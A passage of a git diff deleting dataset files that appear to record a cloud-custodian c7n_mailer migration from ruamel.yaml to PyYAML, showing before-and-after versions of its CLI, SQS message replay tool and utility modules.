'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - 'datadog_api_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'datadog_application_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'slack_token': {'type': 'string'}, - 'slack_webhook': {'type': 'string'}, - 'sendgrid_api_key': SECURED_STRING_SCHEMA, - 'splunk_hec_url': {'type': 'string'}, - 'splunk_hec_token': {'type': 'string'}, - 'splunk_remove_paths': { - 'type': 'array', - 'items': {'type': 'string'} - }, - 'splunk_actions_list': {'type': 'boolean'}, - 'splunk_max_attempts': {'type': 'integer'}, - 'splunk_hec_max_length': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'}, - - # Mapping account / emails - 'account_emails': {'type': 'object'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', type=int, help=max_num_processes_help_msg) - templates_folder_help_msg = 'message templates folder location' - parser.add_argument('-t', '--templates', help=templates_folder_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(processor, max_num_processes): - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - processor.max_num_processes = max_num_processes - processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - - module_dir = path.dirname(path.abspath(__file__)) - default_templates = [path.abspath(path.join(module_dir, 'msg-templates')), - path.abspath(path.join(module_dir, '..', 'msg-templates')), - path.abspath('.')] - templates = args_dict.get('templates', None) - if templates: - default_templates.append(path.abspath(path.expanduser(path.expandvars(templates)))) - - mailer_config['templates_folders'] = default_templates - - provider = get_provider(mailer_config) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported ' - 'with --run, not --update-lambda **\n') - return - - if provider == Providers.Azure: - azure_deploy.provision(mailer_config) - elif provider == Providers.AWS: - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - - # Select correct processor - if provider == Providers.Azure: - processor = MailerAzureQueueProcessor(mailer_config, logger) - elif provider == Providers.AWS: - aws_session = session_factory(mailer_config) - processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - - # Execute - if max_num_processes: - run_mailer_in_parallel(processor, max_num_processes) - else: - processor.run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff deleted file mode 100644 index 155b87f..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff +++ /dev/null @@ -1,20 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/replay.py b/tools/c7n_mailer/c7n_mailer/replay.py - index 9f02c55e03a4ad372fdc9632b64491d93787dc94..12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 100644 - --- a/tools/c7n_mailer/c7n_mailer/replay.py - +++ b/tools/c7n_mailer/c7n_mailer/replay.py -@@ -15,6 +15,7 @@ import json - import logging - import os - import zlib -+import yaml - - import boto3 - import jsonschema -@@ -22,7 +23,6 @@ from c7n_mailer.cli import CONFIG_SCHEMA - from c7n_mailer.email_delivery import EmailDelivery - from c7n_mailer.utils import setup_defaults - from c7n_mailer.utils_email import get_mimetext_message --from ruamel import yaml - - logger = logging.getLogger(__name__) - diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py deleted file mode 100644 index 4c3f6a1..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py +++ /dev/null @@ -1,144 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. -""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import base64 -import json -import logging -import os -import zlib - -import boto3 -import jsonschema -from c7n_mailer.cli import CONFIG_SCHEMA -from c7n_mailer.email_delivery import EmailDelivery -from c7n_mailer.utils import setup_defaults -from c7n_mailer.utils_email import get_mimetext_message -from ruamel import yaml - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'wb') as fh: # pragma: no cover - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = get_mimetext_message( - self.config, - logger, - self.data, - self.data['resources'], - ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload(None, True).decode('utf-8')) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % '; '.join(to_addrs)) - print(mimetext_msg.get_payload(None, True).decode('utf-8')) - return - # else actually send the message... - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-T', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-t', '--templates', default=None, type=str, - help='message templates folder location') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - module_dir = os.path.dirname(os.path.abspath(__file__)) - default_templates = [ - os.path.abspath(os.path.join(module_dir, 'msg-templates')), - os.path.abspath(os.path.join(module_dir, '..', 'msg-templates')), - os.path.abspath('.') - ] - templates = options.templates - if templates: - default_templates.append( - os.path.abspath(os.path.expanduser(os.path.expandvars(templates))) - ) - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - config['templates_folders'] = default_templates - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py deleted file mode 100644 index e8c99cc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py +++ /dev/null @@ -1,144 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. -""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import base64 -import json -import logging -import os -import zlib -import yaml - -import boto3 -import jsonschema -from c7n_mailer.cli import CONFIG_SCHEMA -from c7n_mailer.email_delivery import EmailDelivery -from c7n_mailer.utils import setup_defaults -from c7n_mailer.utils_email import get_mimetext_message - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'wb') as fh: # pragma: no cover - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = get_mimetext_message( - self.config, - logger, - self.data, - self.data['resources'], - ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload(None, True).decode('utf-8')) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % '; '.join(to_addrs)) - print(mimetext_msg.get_payload(None, True).decode('utf-8')) - return - # else actually send the message... - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-T', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-t', '--templates', default=None, type=str, - help='message templates folder location') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - module_dir = os.path.dirname(os.path.abspath(__file__)) - default_templates = [ - os.path.abspath(os.path.join(module_dir, 'msg-templates')), - os.path.abspath(os.path.join(module_dir, '..', 'msg-templates')), - os.path.abspath('.') - ] - templates = options.templates - if templates: - default_templates.append( - os.path.abspath(os.path.expanduser(os.path.expandvars(templates))) - ) - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - config['templates_folders'] = default_templates - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff deleted file mode 100644 index 91df1ec..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/utils.py b/tools/c7n_mailer/c7n_mailer/utils.py - index 9f02c55e03a4ad372fdc9632b64491d93787dc94..12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 100644 - --- a/tools/c7n_mailer/c7n_mailer/utils.py - +++ b/tools/c7n_mailer/c7n_mailer/utils.py -@@ -19,13 +19,13 @@ import functools - import json - import os - import time -+import yaml - - import jinja2 - import jmespath - from botocore.exceptions import ClientError - from dateutil import parser - from dateutil.tz import gettz, tzutc --from ruamel import yaml - - - class Providers(object): diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py deleted file mode 100644 index 5e8ccaf..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py +++ /dev/null @@ -1,437 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from __future__ import absolute_import, division, print_function, unicode_literals - -import base64 -from datetime import datetime, timedelta -import functools -import json -import os -import time - -import jinja2 -import jmespath -from botocore.exceptions import ClientError -from dateutil import parser -from dateutil.tz import gettz, tzutc -from ruamel import yaml - - -class Providers(object): - AWS = 0 - Azure = 1 - - -def get_jinja_env(template_folders): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = functools.partial(yaml.safe_dump, default_flow_style=False) - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.filters['from_json'] = json.loads - env.filters['get_date_age'] = get_date_age - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['resource_tag'] = get_resource_tag_value - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.globals['search'] = jmespath.search - env.loader = jinja2.FileSystemLoader(template_folders) - return env - - -def get_rendered_jinja( - target, sqs_message, resources, logger, - specified_template, default_template, template_folders): - env = get_jinja_env(template_folders) - mail_template = sqs_message['action'].get(specified_template, default_template) - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - - # recast seconds since epoch as utc iso datestring, template - # authors can use date_time_format helper func to convert local - # tz. if no execution start time was passed use current time. - execution_start = datetime.utcfromtimestamp( - sqs_message.get( - 'execution_start', - time.mktime( - datetime.utcnow().timetuple()) - )).isoformat() - - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - execution_start=execution_start, - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - if isinstance(resource['Tags'], dict): - tags = resource['Tags'] - else: - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('runtime', 'python3.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - config.setdefault('datadog_api_key', None) - config.setdefault('slack_token', None) - config.setdefault('slack_webhook', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.now().replace(tzinfo=gettz('UTC')) + timedelta(delta)) - - -def get_date_age(date): - return (datetime.now(tz=tzutc()) - parser.parse(date)).days - - -def format_struct(evt): - return json.dumps(evt, indent=2, ensure_ascii=False) - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def strip_prefix(value, prefix): - if value.startswith(prefix): - return value[len(prefix):] - return value - - -def resource_format(resource, resource_type): - if resource_type.startswith('aws.'): - resource_type = strip_prefix(resource_type, 'aws.') - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - resource.get('Name'), resource['ImageId'], resource['CreationDate']) - elif resource_type == 'sagemaker-notebook': - return "%s" % (resource['NotebookInstanceName']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - cid = resource.get('CacheClusterId') - if cid is None: - cid = ', '.join([ - ns['CacheClusterId'] for ns in resource['NodeSnapshots']]) - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - cid, - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return "%s" % ( - resource['Name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - elif resource_type == "sqs": - return "QueueURL: %s QueueArn: %s " % ( - resource['QueueUrl'], - resource['QueueArn']) - elif resource_type == "efs": - return "name: %s id: %s state: %s" % ( - resource['Name'], - resource['FileSystemId'], - resource['LifeCycleState'] - ) - elif resource_type == "network-addr": - return "ip: %s id: %s scope: %s" % ( - resource['PublicIp'], - resource['AllocationId'], - resource['Domain'] - ) - elif resource_type == "route-table": - return "id: %s vpc: %s" % ( - resource['RouteTableId'], - resource['VpcId'] - ) - elif resource_type == "app-elb": - return "arn: %s zones: %s scheme: %s" % ( - resource['LoadBalancerArn'], - len(resource['AvailabilityZones']), - resource['Scheme']) - elif resource_type == "nat-gateway": - return "id: %s state: %s vpc: %s" % ( - resource['NatGatewayId'], - resource['State'], - resource['VpcId']) - elif resource_type == "internet-gateway": - return "id: %s attachments: %s" % ( - resource['InternetGatewayId'], - len(resource['Attachments'])) - elif resource_type == 'lambda': - return "Name: %s RunTime: %s \n" % ( - resource['FunctionName'], - resource['Runtime']) - else: - return "%s" % format_struct(resource) - - -def get_provider(mailer_config): - if mailer_config.get('queue_url', '').startswith('asq://'): - return Providers.Azure - - return Providers.AWS - - -def kms_decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - try: - kms = session.client('kms') - return kms.decrypt( - CiphertextBlob=base64.b64decode(config[encrypted_field]))[ - 'Plaintext'].decode('utf8') - except (TypeError, base64.binascii.Error) as e: - logger.warning( - "Error: %s Unable to base64 decode %s, will assume plaintext." % - (e, encrypted_field)) - except ClientError as e: - if e.response['Error']['Code'] != 'InvalidCiphertextException': - raise - logger.warning( - "Error: %s Unable to decrypt %s with kms, will assume plaintext." % - (e, encrypted_field)) - return config[encrypted_field] - else: - logger.debug("No encrypted value to decrypt.") - return None - - -def decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - provider = get_provider(config) - if provider == Providers.Azure: - from c7n_mailer.azure_mailer.utils import azure_decrypt - return azure_decrypt(config, logger, session, encrypted_field) - elif provider == Providers.AWS: - return kms_decrypt(config, logger, session, encrypted_field) - else: - raise Exception("Unknown provider") - else: - logger.debug("No encrypted value to decrypt.") - return None - - -# https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-user-identity.html -def get_aws_username_from_event(logger, event): - if event is None: - return None - identity = event.get('detail', {}).get('userIdentity', {}) - if not identity: - logger.warning("Could not get recipient from event \n %s" % ( - format_struct(event))) - return None - if identity['type'] == 'AssumedRole': - logger.debug( - 'In some cases there is no ldap uid is associated with AssumedRole: %s', - identity['arn']) - logger.debug( - 'We will try to assume that identity is in the AssumedRoleSessionName') - user = identity['arn'].rsplit('/', 1)[-1] - if user is None or user.startswith('i-') or user.startswith('awslambda'): - return None - if ':' in user: - user = user.split(':', 1)[-1] - return user - if identity['type'] == 'IAMUser' or identity['type'] == 'WebIdentityUser': - return identity['userName'] - if identity['type'] == 'Root': - return None - # this conditional is left here as a last resort, it should - # be better documented with an example UserIdentity json - if ':' in identity['principalId']: - user_id = identity['principalId'].split(':', 1)[-1] - else: - user_id = identity['principalId'] - return user_id diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py deleted file mode 100644 index 87cdce2..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py +++ /dev/null @@ -1,437 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from __future__ import absolute_import, division, print_function, unicode_literals - -import base64 -from datetime import datetime, timedelta -import functools -import json -import os -import time -import yaml - -import jinja2 -import jmespath -from botocore.exceptions import ClientError -from dateutil import parser -from dateutil.tz import gettz, tzutc - - -class Providers(object): - AWS = 0 - Azure = 1 - - -def get_jinja_env(template_folders): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = functools.partial(yaml.safe_dump, default_flow_style=False) - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.filters['from_json'] = json.loads - env.filters['get_date_age'] = get_date_age - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['resource_tag'] = get_resource_tag_value - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.globals['search'] = jmespath.search - env.loader = jinja2.FileSystemLoader(template_folders) - return env - - -def get_rendered_jinja( - target, sqs_message, resources, logger, - specified_template, default_template, template_folders): - env = get_jinja_env(template_folders) - mail_template = sqs_message['action'].get(specified_template, default_template) - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - - # recast seconds since epoch as utc iso datestring, template - # authors can use date_time_format helper func to convert local - # tz. if no execution start time was passed use current time. - 